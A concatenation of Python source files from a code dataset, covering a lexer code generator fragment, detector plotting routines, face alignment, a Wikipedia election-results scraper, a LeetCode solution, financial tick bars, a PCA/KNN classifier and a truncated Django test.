sub_name, sub_type in type_descr.items() # No sort! [MEMBER PACKAGING]\n )\n txt.append(\"\\n } %s;\\n\" % name)\n else:\n txt.append(\"%s\\n\" % __member(type_descr, TL, name, NL, IndentationOffset=\" \" * 4))\n txt.append(\" } content;\\n\")\n #txt += Lng._SOURCE_REFERENCE_END()\n return \"\".join(txt)\n\ndef __member(TypeCode, MaxTypeNameL, VariableName, MaxVariableNameL, IndentationOffset=\"\"):\n my_def = Lng._SOURCE_REFERENCE_BEGIN(TypeCode.sr)\n my_def += IndentationOffset\n my_def += Lng.CLASS_MEMBER_DEFINITION(TypeCode.get_pure_text(), MaxTypeNameL, \n VariableName)\n my_def += Lng._SOURCE_REFERENCE_END(TypeCode.sr)\n return my_def\n\ndef get_setter_getter(Descr):\n \"\"\"NOTE: All names are unique even in combined unions.\"\"\"\n TL = Descr.type_name_length_max()\n NL = Descr.variable_name_length_max()\n variable_db = Descr.get_member_db()\n txt = \"\"\n for variable_name, info in variable_db.items():\n type_code = info[0]\n access = info[1]\n type_str = type_code.get_pure_text()\n txt += Lng._SOURCE_REFERENCE_BEGIN(type_code.sr)\n my_def = \" %s%s get_%s() const %s{ return %s; }\" \\\n % (type_str, \" \" * (TL - len(type_str)), \n variable_name, \" \" * ((NL + TL)- len(variable_name)), \n access)\n txt += my_def\n\n type_str = type_str.strip()\n type_str = type_str.replace(\"\\t\", \" \")\n while type_str.find(\" \") != -1:\n type_str = type_str.replace(\" \", \" \")\n if type_str not in [\"char\", \"unsigned char\", \"singed char\",\n \"short\", \"unsigned short\", \"singed short\",\n \"int\", \"unsigned int\", \"singed int\",\n \"long\", \"unsigned long\", \"singed long\",\n \"float\", \"unsigned float\", \"singed float\",\n \"double\", \"unsigned double\", \"singed double\",\n \"uint8_t\", \"uint16_t\", \"uint32_t\",\n \"int8_t\", \"int16_t\", \"int32_t\",\n \"size_t\", \"uintptr_t\", \"ptrdiff_t\"]:\n type_str += \"&\"\n\n txt += Lng._SOURCE_REFERENCE_BEGIN(type_code.sr)\n my_def = \" void%s set_%s(%s Value) %s{ %s = Value; }\" \\\n % (\" \" * (TL - len(\"void\")), \n variable_name, type_str, \" \" * (NL + TL - (len(type_str) + len(variable_name))), \n access)\n txt += my_def\n\n txt += Lng._SOURCE_REFERENCE_END()\n return txt\n\ndef get_quick_setters(Descr):\n \"\"\"NOTE: All names are unique even in combined unions.\"\"\"\n variable_db = Descr.get_member_db()\n used_signature_list = []\n\n def __quick_setter(ArgList, used_signature_list):\n \"\"\"ArgList = [ [Name, Type], [Name, Type], ...]\n \n NOTE: There cannot be two signatures of the same type specification.\n This is so, since functions are overloaded, have the same name\n and only identify with their types.\n \"\"\"\n signature = map(lambda x: x[1].get_pure_text(), ArgList)\n if signature in used_signature_list:\n return []\n else:\n used_signature_list.append(signature)\n\n def _get_arg(info, i):\n name, type_info = info\n type_str = type_info.get_pure_text()\n if type_str.find(\"const\") != -1: type_str = type_str[5:]\n return \"const %s& Value%i\" % (type_str, i)\n\n def _get_assignment(info, i):\n name, type_info = info\n return \"%s = Value%i; \" % (variable_db[name][1], i)\n\n txt = [\n \" void set(const QUEX_TYPE_TOKEN_ID ID, \",\n \", \".join(\n _get_arg(info, i) for i, info in enumerate(ArgList)\n ),\n \")\\n { \",\n \"id = ID; \"\n ]\n txt.extend(\n _get_assignment(info, i)\n for i, info in enumerate(ArgList)\n )\n txt.append(\"}\\n\")\n\n return txt\n\n def __combined_quick_setters(member_db, used_signature_list):\n member_list = member_db.items()\n if len(member_list) == 0: return []\n\n # sort the members with respect to their occurence in the token_type section\n member_list.sort(lambda x, y: cmp(x[1].sr.line_n, y[1].sr.line_n))\n L = len(member_list)\n # build the argument list consisting of a permutation of distinct members\n arg_list = [ member_list[i] for i in range(L) ]\n\n return __quick_setter(arg_list, used_signature_list)\n\n # (*) Quick setters for distinct members\n txt = __combined_quick_setters(Descr.distinct_db, used_signature_list)\n\n # (*) Quick setters for union members\n complete_f = True\n for name, type_info in Descr.union_db.items():\n if isinstance(type_info, OrderedDict): \n setter_txt = __combined_quick_setters(type_info, used_signature_list)\n else: \n setter_txt = __quick_setter([[name, type_info]], used_signature_list)\n\n if not setter_txt: complete_f = False\n txt.extend(setter_txt)\n\n if not complete_f:\n txt.insert(0, \" /* Not all members are accessed via quick-setters (avoid overload errors). */\")\n\n return \"\".join(txt)\n\nhelper_definitions_common = \"\"\"\n/* In cases, such as DLL compilation for some dedicated compilers, \n * the classes need some epilog. If the user does not specify such\n * a thing, it must be empty. */\n#ifndef QUEX_SETTING_USER_CLASS_DECLARATION_EPILOG_EXT\n# define QUEX_SETTING_USER_CLASS_DECLARATION_EPILOG_EXT\n#endif\n\n#ifdef QUEX_OPTION_ASSERTS\n$$ # include $$\n$$ # include $$\n# define __quex_assert(X) assert(X)\n#else\n# define __quex_assert(X) /* no assert */\n#endif\n\"\"\"\n\ndef _some_standard_stuff(Descr):\n \"\"\"RETURNS: [0] virtual_destructor_str\n [1] body of the 'copy' function\n [2] body of the 'take_text' function\n \"\"\"\n virtual_destructor_str = \"\"\n if Descr.open_for_derivation_f: \n virtual_destructor_str = Lng.VIRTUAL_DESTRUCTOR_PREFIX\n\n if Descr.copy is None:\n # Default copy operation: Plain Copy of token memory\n copy_str = Lng.DEFAULT_TOKEN_COPY(\"__this\", \"__That\")\n else:\n copy_str = Lng.SOURCE_REFERENCED(Descr.copy)\n\n if Descr.take_text is None:\n take_text_str = \"%s\\n\" % Lng.RETURN_THIS(Lng.TRUE)\n else:\n take_text_str = Lng.SOURCE_REFERENCED(Descr.take_text)\n\n return virtual_destructor_str, \\\n copy_str, \\\n take_text_str\n\n\n","sub_path":"quex/output/token/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":14328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"265425731","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 29 09:44:35 2019\n\n@author: james, louise, JCH\n\"\"\"\n\nfrom __future__ import division, print_function\nimport numpy as np\nimport qubic.fibtools as ft\nfrom matplotlib.pyplot import *\nfrom pysimulators import FitsArray\nimport matplotlib.mlab as mlab\nimport scipy.ndimage.filters as f\n\n\ndef TimeSigPlot(time, dd, theTES):\n figure()\n clf()\n plot(time, dd[theTES, :])\n xlabel('Time [s]')\n ylabel('Current [nA]')\n\n return\n\n\ndef FreqResp(freq, frange, filtered_spec, theTES, fff):\n figure()\n # setup plot params\n rng = (freq > frange[0]) & (freq < frange[1])\n loglog(freq[rng], filtered_spec[rng], label='Data')\n\n # do plot\n xlim(frange[0], frange[1])\n title('Tes #{}'.format(theTES + 1))\n ylim(np.min(filtered_spec[rng]) * 0.8, np.max(filtered_spec[rng]) * 1.2)\n xlabel('Freq [Hz]')\n ylabel('Power Spectrum [$nA^2.Hz^{-1}$]')\n #### Show where the signal is expected\n for ii in range(10): plot(np.array([fff, fff]) * (ii + 1), [1e-20, 1e-10], 'r--', alpha=0.3)\n #### PT frequencies\n fpt = 1.724\n for ii in range(10): plot(np.array([fpt, fpt]) * (ii + 1), [1e-20, 1e-10], 'k--', alpha=0.3)\n\n return\n\n\n\ndef FiltFreqResp(theTES, frange, fff, filt, dd, notch, FREQ_SAMPLING, nsamples, freq, spectrum, filtered_spec):\n \"\"\"\n Plot original and notch filtered frequency.\n sigfilt requires you select for which TES you would like to\n apply the notch filter - single TES analysis\n\n \"\"\"\n # notch filter according to notch - must select TES\n\n sigfilt = dd[theTES, :]\n for i in range(len(notch)):\n sigfilt = ft.notch_filter(sigfilt, notch[i][0], notch[i][1], FREQ_SAMPLING)\n\n # get new spectrum with notch filter applied\n spectrum_f, freq_f = mlab.psd(sigfilt, Fs=FREQ_SAMPLING, NFFT=nsamples, window=mlab.window_hanning)\n\n # start plotting\n figure()\n xlim(frange[0], frange[1])\n rng = (freq > frange[0]) & (freq < frange[1])\n loglog(freq[rng], filtered_spec[rng], label='Data')\n loglog(freq[rng], f.gaussian_filter1d(spectrum_f, filt)[rng], label='Filt')\n title('Tes #{}'.format(theTES + 1))\n ylim(np.min(filtered_spec[rng]) * 0.8, np.max(filtered_spec[rng]) * 1.2)\n xlabel('Freq [Hz]')\n ylabel('Power Spectrum [$nA^2.Hz^{-1}$]')\n #### Show where the signal is expected\n for ii in range(10): plot(np.array([fff, fff]) * (ii + 1), [1e-20, 1e-10], 'r--', alpha=0.3)\n #### PT frequencies\n fpt = 1.724\n for ii in range(10): plot(np.array([fpt, fpt]) * (ii + 1), [1e-20, 1e-10], 'k--', alpha=0.3)\n\n return\n\n\ndef FoldedFiltTES(tt, pars, theTES, folded, folded_notch):\n figure()\n ### Plot it along with a guess for fiber signal\n plot(tt, np.mean(folded, axis=0), label='Median of Folding')\n plot(tt, folded[theTES, :], label='Data TES #{}'.format(theTES))\n plot(tt, folded_notch[theTES, :], label='Data TES #{} (with Notch filter)'.format(theTES))\n # for simsig, we should pass in 'pars' values\n plot(tt, ft.simsig(tt, pars), label='Expected')\n legend()\n ylabel('Current [nA]')\n xlabel('time [s]')\n\n return\n\n\ndef FoldedTESFreeFit(tt, bla, theTES, folded):\n figure()\n # takes in free fit result as 'bla'\n params = bla[1]\n err = bla[2]\n\n plot(tt, folded[theTES, :], label='Data TES #{}'.format(theTES))\n plot(tt, ft.simsig(tt, bla[1]),\n label='Fitted: \\n cycle={0:8.3f}+/-{1:8.3f} \\n tau = {2:8.3f}+/-{3:8.3f}s \\n t0 = {4:8.3f}+/-{5:8.3f}s \\n amp = {6:8.3f}+/-{7:8.3f}'.format(\n params[0], err[0], params[1], err[1], params[2], err[2], params[3], err[3]))\n legend()\n ylabel('Current [nA]')\n xlabel('time [s]')\n title('TES {} folded with simsig params'.format(theTES))\n\n return\n\n\ndef Allplots(fib, allparams, allparams1, allparams2, okfinal, okfinal1, okfinal2, asic, med=False, rng=None,\n cmap='viridis'):\n figure()\n\n subplot(2, 2, 1)\n mmt, sst = ft.meancut(allparams[okfinal, 1], 3)\n hist(allparams[okfinal, 1], range=[0, mmt + 4 * sst], bins=15,\n label='All ({}) '.format(okfinal.sum()) + ft.statstr(allparams[okfinal, 1] * 1000, median=med) + ' ms',\n alpha=0.5)\n hist(allparams1[okfinal1, 1], range=[0, mmt + 4 * sst], bins=15,\n label='Asic1 ({})'.format(okfinal1.sum()) + ft.statstr(allparams1[okfinal1, 1] * 1000, median=med) + ' ms',\n alpha=0.5)\n hist(allparams1[okfinal2, 1], range=[0, mmt + 4 * sst], bins=15,\n label='Asic2 ({})'.format(okfinal2.sum()) + ft.statstr(allparams2[okfinal2, 1] * 1000, median=med) + ' ms',\n alpha=0.5)\n xlabel('Tau [sec]')\n legend(fontsize=7, frameon=False)\n title('Fib {} - Tau [s]'.format(fib))\n\n subplot(2, 2, 2)\n mma, ssa = ft.meancut(allparams[okfinal, 3], 3)\n hist(allparams[okfinal, 3], range=[0, mma + 4 * ssa], bins=15,\n label='All ({}) '.format(okfinal.sum()) + ft.statstr(allparams[okfinal, 3], median=med) + ' nA', alpha=0.5)\n hist(allparams1[okfinal1, 3], range=[0, mma + 4 * ssa], bins=15,\n label='Asic1 ({}) '.format(okfinal1.sum()) + ft.statstr(allparams1[okfinal1, 3], median=med) + ' nA',\n alpha=0.5)\n hist(allparams1[okfinal2, 3], range=[0, mma + 4 * ssa], bins=15,\n label='Asic2 ({}) '.format(okfinal2.sum()) + ft.statstr(allparams2[okfinal2, 3], median=med) + ' nA',\n alpha=0.5)\n xlabel('Amp [nA]')\n legend(fontsize=7, frameon=False)\n title('Fib {} - Amp [nA]'.format(fib))\n\n subplot(2, 2, 3)\n imtau = ft.image_asics(data1=allparams1[:, 1], data2=allparams2[:, 1])\n imshow(imtau, vmin=0, vmax=mmt + 4 * sst, interpolation='nearest', cmap=cmap)\n title('Tau [s] - Fiber {}'.format(fib, asic))\n colorbar()\n\n subplot(2, 2, 4)\n imamp = ft.image_asics(data1=allparams1[:, 3], data2=allparams2[:, 3])\n imshow(imamp, vmin=0, vmax=mma + 4 * ssa, interpolation='nearest', cmap=cmap)\n title('Amp [nA] - Fiber {}'.format(fib, asic))\n colorbar()\n tight_layout()\n return\n\n\ndef TESvsThermo(fib, tt, folded1, folded2, okfinal1, okfinal2, thermos):\n figure()\n subplot(2, 1, 1)\n plot(tt, np.mean(folded1[okfinal1 * ~thermos, :], axis=0), 'b', lw=2, label='Valid TES average')\n plot(tt, np.mean(folded1[thermos, :], axis=0), 'r', lw=2, label='Thermometers')\n title('Fib = {} - ASIC 1'.format(fib))\n legend(loc='upper left', fontsize=8)\n subplot(2, 1, 2)\n plot(tt, np.mean(folded2[okfinal2 * ~thermos, :], axis=0), 'b', lw=2, label='Valid TES average')\n plot(tt, np.mean(folded2[thermos, :], axis=0), 'r', lw=2, label='Thermometers')\n title('Fib = {} - ASIC 2'.format(fib))\n\n return\n","sub_path":"qubic/plotters.py","file_name":"plotters.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"576919873","text":"# USAGE\n# python align_faces.py --shape-predictor shape_predictor_68_face_landmarks.dat --image images/example_01.jpg\n\n# import the necessary packages\nfrom face_aligner import FaceAligner\nfrom imutils.face_utils import rect_to_bb\nimport argparse\nimport imutils\nimport dlib\nimport cv2\nfrom matplotlib import pyplot as plt\n\n\n# # construct the argument parser and parse the arguments\n# ap = argparse.ArgumentParser()\n# ap.add_argument(\"-p\", \"--shape-predictor\", required=True,\n# \thelp=\"path to facial landmark predictor\")\n# ap.add_argument(\"-i\", \"--image\", required=True,\n# \thelp=\"path to input image\")\n# args = vars(ap.parse_args())\n\n# initialize dlib's face detector (HOG-based) and then create\n# the facial landmark predictor and the face aligner\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\nfa = FaceAligner(predictor, desiredFaceWidth=256)\n\n# load the input image, resize it, and convert it to grayscale\nimage = cv2.imread('images/example_01.jpg')\nimage = imutils.resize(image, width=800)\nRGB_im = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# show the original input image and detect faces in the grayscale\n# image\n# cv2.imshow(\"Input\", image)\nrects = detector(gray, 2)\n\n# loop over the face detections\nfor rect in rects:\n # extract the ROI of the *original* face, then align the face\n # using facial landmarks\n (x, y, w, h) = rect_to_bb(rect)\n faceOrig = imutils.resize(RGB_im[y:y + h, x:x + w], width=256)\n faceAligned = fa.align(image, gray, rect)\n faceAligned_RGB = cv2.cvtColor(faceAligned, cv2.COLOR_BGR2RGB)\n\n plt.figure(figsize=(15,15))\n\n plt.subplot(121)\n plt.imshow(faceOrig)\n\n plt.subplot(122)\n\n plt.imshow(faceAligned_RGB)\n plt.savefig('img1.png')","sub_path":"src/align_faces.py","file_name":"align_faces.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"268611874","text":"import re\nimport yaml\nfrom collections import defaultdict\nfrom tqdm import tqdm\n\nimport requests\nfrom bs4 import BeautifulSoup, Tag\n\nfrom countries_adapter import country_matching_re, get_common_name\n\n\nWIKI_URL = 'https://en.wikipedia.org'\n\n\nclass ElectionsParsingError(Exception):\n pass\n\n\ndef concat_substrings(tag):\n return (' '.join(s.strip() for s in tag.strings)).strip()\n\n\ndef parse_country_and_year(soup):\n main_div = soup.find(id='mw-content-text')\n country, year = None, None\n for paragraph in main_div.find_all('p'):\n text = concat_substrings(paragraph)\n try:\n if country is None:\n match = next(country_matching_re.finditer(text))\n country = get_common_name(match.group())\n except StopIteration:\n pass\n try:\n if year is None:\n match = next(re.finditer(r'\\d{4,4}', text))\n year = match.group()\n except StopIteration:\n pass\n if country and year:\n return country, year\n raise ElectionsParsingError(\"Unable to parse country or year\")\n\n\ndef find_election_results_section(soup):\n for header in soup.find_all([\"h2\", \"h3\", \"h4\"]):\n for tag in header.contents:\n if tag.string == 'Results':\n return header\n raise ElectionsParsingError(\"Results table not found\")\n\n\ndef first_table_under_header(header):\n for tag in header.next_siblings:\n if tag.name == 'table':\n return tag\n raise ElectionsParsingError(\"Results table not found\")\n\n\ndef parse_table_for_election_results(table, headers_log):\n\n def find_string_idx_in_list_by_ordered_pattern_list(strings, patterns):\n for pattern in patterns:\n for i, string in enumerate(strings):\n if re.match(pattern, string, flags=re.IGNORECASE):\n return i\n return None\n\n def parse_vote_count(string):\n try:\n string = string.strip()\n string = string.replace(',', '')\n string = string.strip('%')\n string = string.split('(')[0]\n string = string.split('[')[0]\n return float(string)\n except Exception:\n raise ElectionsParsingError(f\"Error while parsing vote count '{string}'\")\n\n tbody = table.find('tbody')\n header_row = tbody.find('tr')\n\n column_headers = header_row.find_all('th')\n # use colspan attr to determine 'true' column indices\n # each column is repeated as many times as its colspan\n column_headers_plaincolumns = []\n for col in column_headers:\n try:\n repeat = int(col['colspan'])\n except Exception:\n repeat = 1\n for _ in range(repeat):\n column_headers_plaincolumns.append(col)\n\n column_names = [concat_substrings(th) for th in column_headers_plaincolumns]\n\n headers_log.write(' | '.join(column_names) + '\\n')\n columns_count = len(column_names)\n\n candidate_patterns = ['presidential candidate', 'candidate', 'electoral values']\n vote_patterns = ['electoral vote', 'vote', r'%', 'public vote', 'total']\n stopword_patterns = [r'.*round']\n candidate_i = find_string_idx_in_list_by_ordered_pattern_list(column_names, candidate_patterns)\n vote_i = find_string_idx_in_list_by_ordered_pattern_list(column_names, vote_patterns)\n if find_string_idx_in_list_by_ordered_pattern_list(column_names, stopword_patterns) is not None:\n raise ElectionsParsingError(\"Election with first and second round\")\n if candidate_i is None or vote_i is None:\n raise ElectionsParsingError(f\"Unable to identify candidate or vote column among {column_names}\")\n\n election_results = dict()\n for row in header_row.next_siblings:\n if not isinstance(row, Tag):\n # skip line-break strings\n continue\n if 'th' in {tag.name for tag in row.children}:\n # skip sub-header\n continue\n tds = row.find_all('td')\n if len(tds) < columns_count:\n # to detect and stop parsing on 'Total' row or something alike\n break\n if not concat_substrings(tds[0]):\n # to account for colored badges before first column\n i_shift = 1\n else:\n i_shift = 0\n\n candidate = concat_substrings(tds[i_shift + candidate_i])\n votes = parse_vote_count(concat_substrings(tds[vote_i]))\n if not candidate:\n raise ElectionsParsingError(f\"Error while parsing candidate: {tds[i_shift + candidate_i]}\")\n if re.match('total', candidate, flags=re.IGNORECASE):\n break\n election_results[candidate] = votes\n\n if not election_results:\n raise ElectionsParsingError(f\"No rows found: {tbody.prettify()}\")\n else:\n total = sum(election_results.values())\n return {cand: votes / total for cand, votes in sorted(election_results.items(), key=lambda item: item[1])}\n\n\ndef parse_and_save_election_page(election_page, output_stream):\n r = requests.get(WIKI_URL + election_page)\n soup = BeautifulSoup(r.text, 'html.parser')\n\n elections_data = defaultdict(dict)\n\n try:\n country, year = parse_country_and_year(soup)\n elections_data[election_page]['country'] = country\n elections_data[election_page]['year'] = year\n except ElectionsParsingError:\n pass\n\n with open('data/wiki_election_pages_parsing_errors.txt', 'a') as f:\n try:\n results_header = find_election_results_section(soup)\n table = first_table_under_header(results_header)\n with open('data/headers_log.txt', 'a') as headers_log:\n elections_data[election_page]['results'] = parse_table_for_election_results(table, headers_log)\n yaml.dump(dict(elections_data), output_stream)\n except ElectionsParsingError as e:\n f.write(f'Error while parsing {WIKI_URL + election_page}:\\n\\t{str(e)}\\n\\n')\n\n\npages_filename = 'data/election_wiki_pages.txt'\n\nwith open(pages_filename) as f:\n for total, l in enumerate(f):\n pass\ntotal += 1\n\nwith open(pages_filename, 'r') as pages_file, open('data/election_results.yaml', 'w') as results_file:\n for page in tqdm(pages_file, total=total):\n page = page.strip()\n parse_and_save_election_page(page, results_file)\n\n\n# sample_election_page = '/wiki/2006_Finnish_presidential_election'\n\n# with open('temp.yaml', 'w') as f:\n# parse_and_save_election_page(sample_election_page, f)\n","sub_path":"wiki_election_page_parser.py","file_name":"wiki_election_page_parser.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144055668","text":"class Solution:\n def minSteps(self, s: str, t: str) -> int:\n # leetcode = {l:1, e:3, t:1, c:1, o:1, d:1 }\n # practice = {p:1, r:1, a:1, c:2, t:1, i:1, e:1}\n # h1 = [0]*26\n # h2 = [0]*26\n # for char in s:\n # h1[ord(char)-ord('a')]+=1\n # for char in t:\n # h2[ord(char)-ord('a')]+=1\n # # print(h1)\n # # print(h2)\n # ans = 0\n # for char in string.ascii_lowercase:\n # temp = h1[ord(char)-ord('a')] - h2[ord(char)-ord('a')]\n # ans+=max(0,temp)\n # return ans\n \n from collections import defaultdict, Counter\n # h1 = defaultdict(int)\n # h2 = defaultdict(int)\n # for char in s:\n # h1[char]+=1\n # for char in t:\n # h2[char]+=1\n h1 = Counter(s)\n h2 = Counter(t)\n ans = 0\n # print(h1,h2)\n for char in h1:\n ans += max(0,(h1[char] - h2[char]))\n return ans\n\nobj = Solution()\nprint(obj.minSteps(\"leetcode\",\"practice\"))","sub_path":"1347-Minimum-Number-of-Steps-to-Make-Two-Strings-Anagram.py","file_name":"1347-Minimum-Number-of-Steps-to-Make-Two-Strings-Anagram.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322685471","text":"\"\"\"\nA base class for the various bar types. Includes the logic shared between classes, to minimise the amount of\nduplicated code.\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom ._base_bars import _BaseBars\n\nclass TickBar(_BaseBars):\n \"\"\"\n Abstract base class which contains the structure which is shared between the various standard and information\n driven bars. There are some methods contained in here that would only be applicable to information bars but\n they are included here so as to avoid a complicated nested class structure.\n \"\"\"\n\n def __init__(self, threshold=None, dictcol=None):\n \"\"\"\n Constructor\n\n :param file_path: (String) Path to the csv file containing raw tick data in the format[date_time, price, volume]\n :param metric: (String) type of imbalance bar to create. Example: dollar_imbalance.\n :param batch_size: (Int) Number of rows to read in from the csv, per batch.\n \"\"\"\n # Base properties\n _BaseBars.__init__(self, threshold, dictcol)\n\n\n\n def _extract_bars(self, inputdf):\n \"\"\"\n This method is required by all the bar types and is used to create the desired bars.\n :param data: (DataFrame) Contains 3 columns - date_time, price, and volume.\n :return: (List) of bars built using the current batch.\n \"\"\"\n t_price = inputdf['price']\n ts = 0\n idx = []\n for i, _ in enumerate(t_price):\n ts += 1\n if ts >= self.threshold:\n idx.append(i)\n ts = 0\n continue\n return inputdf.iloc[idx,:].index.drop_duplicates()\n","sub_path":"custombar/_tickbar.py","file_name":"_tickbar.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"325790300","text":"import scipy\nimport numpy\nimport csv\nfrom matplotlib.mlab import PCA\n\n#every row in the *.mat file is 256*256 numbers representing gray scale values\n#for each pixel in an image. i.e. if XTrain.mat has 1000 lines than each line\n#will be made up of 256*256 numbers and there would be 1000 images in the file.\n#The following loads the image into a sciPy matrix where each row is a vector\n#of length 256*256, representing an image. This code will need to be switched\n#out if you have a different method of storing images.\n\nfp1 = open(\"train1.csv\")\nfp2 = open(\"train2.csv\")\n\ncsv_data_train = list(csv.reader(fp1,\"excel\"))\ncsv_data_test = list(csv.reader(fp2,\"excel\"))\n\nXtest = []\nfor i in range(1,len(csv_data_train)):\n Xtest.append(csv_data_train[i][0])\n\nYtest = []\n\nfor i in range(1,len(csv_data_test)):\n Ytest.append(csv_data_test[i][0])\n\nXtrain = []\n\nfor i in range(1,len(csv_data_train)):\n temp = [] \n for j in range(1,len(csv_data_train[i])):\n temp.append(csv_data_train[i][j])\n Xtrain.append(temp) \n \n\nYtrain = []\n\nfor i in range(1,len(csv_data_test)):\n temp = [] \n for j in range(1,len(csv_data_test[i])):\n temp.append(csv_data_test[i][j])\n Ytrain.append(temp) \n\n\nXtest = numpy.array(Xtest).astype(\"int\")\nYtest = numpy.array(Ytest).astype(\"int\")\nXtrain = numpy.array(Xtrain).astype(\"int\")\nYtrain = numpy.array(Ytrain).astype(\"int\")\n\n#Xtrain = scipy.io.loadmat('Xtrain.mat')[\"Xtrain\"]\n#Ytrain = scipy.io.loadmat('Ytrain.mat')[\"Ytrain\"]\n#Xtest = scipy.io.loadmat('Xtest.mat')[\"Xtest\"]\n#Ytest = scipy.io.loadmat('Ytest.mat')[\"Ytest\"]\n\n#learn(Xtest,Xtrain,Ytest,Ytrain,5) #this lowers the dimension from 256*256 to 5\n\ndef learn(testX,trainX,testY,trainY,n):\n pcmat = PCA(trainX)\n lowdimtrain=numpy.mat(trainX)*pcmat #lower the dimension of trainX\n lowdimtest=numpy.mat(testX)*pcmat #lower the dimension of testX\n #run some learning algorithm here using the low dimension matrices for example\n trainset = [] \n\n knnres = KNN(lowdimtrain, trainY, lowdimtest ,k)\n numloss=0\n for i in range(len(knnres)):\n if knnres[i]!=testY[i]:\n numloss+=1\n return numloss\n\n\"\"\"\ndef PCA(Xparam, n):\n X = numpy.mat(Xparam)\n Xtranspose = X.transpose()\n A=Xtranspose*X\n return eigs(A,n)\n\ndef eigs(M,k):\n [vals,vecs]=numpy.linalg.eig(M)\n return LM2ML(vecs[:k])\n\ndef LM2ML(lm):\n U=[[]]\n temp = []\n for i in lm: \n for j in range(len(i)):\n temp.append(i[0,j])\n U.append(temp)\n temp = []\n U=U[1:]\n return U\n\"\"\"\n\n\n\n\ndef KNN(trainset, Ytrainvec, testset, k):\n eucdist = scidist.cdist(testset,trainset,'sqeuclidean')\n res=[]\n for dists in eucdist:\n distup = zip(dists, Ytrainvec)\n minVals = []\n sumLabel=0;\n for it in range(k):\n minIndex = index_min(dists)\n (minVal,minLabel) = distup[minIndex]\n del distup[minIndex]\n dists=numpy.delete(dists,minIndex,0)\n if minLabel == 1:\n sumLabel+=1\n else:\n sumLabel-=1\n if(sumLabel>0):\n res.append(1)\n else:\n res.append(0)\n return res\n\nlearn(Xtest,Xtrain,Ytest,Ytrain,5) #this lowers the dimension from 256*256 to 5","sub_path":"KNN_classifier.py","file_name":"KNN_classifier.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"254324196","text":"import argparse\nimport os\nimport locale\n\nfrom playstationpresence.playstationpresence import PlaystationPresence\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--no-tray-icon\", help=\"Don't create a tray icon\", action=\"store_true\")\n args = parser.parse_args()\n\n pspresence = PlaystationPresence(locale.getdefaultlocale()[0])\n\n if args.no_tray_icon:\n pspresence.mainloop(notifier=None)\n else:\n from winstray import MenuItem as item\n from winstray._win32 import Icon, loadIcon\n\n image = loadIcon(os.path.join(os.path.dirname(__file__), 'logo.ico'))\n menu = [item('Quit', pspresence.quit)]\n\n icon: Icon = Icon(\"playstationpresence\", image, \"playstationpresence\", menu)\n icon.icon = image\n icon.run(pspresence.mainloop)\n\nif __name__ == \"__main__\":\n main()","sub_path":"presence.py","file_name":"presence.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"344603362","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 21 00:13:05 2018\n\n@author: roberto\n\"\"\"\n\n# coding=utf-8\n\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom nltk.stem.snowball import SnowballStemmer\nimport unicodedata\n\n \n\ndef CleansingText(text):\n print(type(text))\n text = unicodedata.normalize('NFD', text.decode('utf-8')).encode('ascii', 'ignore').decode('utf-8')\n stop = set(stopwords.words('spanish'))\n \n \n punct = set(['“','”','!','\"','#','$','%','&','/','(',')','=','?','¿','*','[',']','{','}','-','_','*','¡','.',':',';',',','^','>','<','@','...','+',\"'\", ' ', 'b', 'c', 'd', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'p', 'q', 'r', 's', 't', 'w', 'x', 'y', 'z'])\n stop.update(['rt'])\n \n \n stop.remove('no')\n stop.remove('ni')\n stop.remove('sin')\n stop.remove('mucho')\n stop.remove('muchos')\n stop.remove('todos')\n stop.remove('contra')\n \n stemmer = SnowballStemmer(\"spanish\")\n wstopText = []\n wstopText2 =[]\n wStopList = []\n\n # text = unicodedata.normalize('NFD', decode('utf-8')).encode('ascii', 'ignore').decode('utf-8')\n text = text.lower()\n\n for word in text.split():\n if word not in stop and 'http' not in word and 'https' not in word and word not in punct:\n wstopText.append(word)\n \n toker = RegexpTokenizer(r'((?<=[^\\w\\s])\\w(?=[^\\w\\s])|(\\W))+', gaps=True)\n wstopText = toker.tokenize(' '.join(wstopText))\n\n for word in wstopText:\n if word not in punct:\n wstopText2.append(word)\n\n for word in wstopText2:\n wstopText2 = [stemmer.stem(s) for s in wstopText2]\n wStopList.append(' '.join(wstopText2))\n break\n\n if len(wStopList):\n return wStopList\n return ''\n\nprint(preprocessing(\"- https http rt MONTERREY TUVO OTRO AÑO PERDIDO EN EL COMBATE A LA CONTAMINACIÓN - Me sumo a la iniciativa #respiramonterrey par… https://t.co/mR28K81VIW\"))","sub_path":"EnviromentTextClustering/cleaningText.py","file_name":"cleaningText.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"93955347","text":"from django.test import TestCase, Client\nfrom django.urls import reverse, resolve\nfrom rest_framework import status\nfrom api.views import *\nfrom api.views 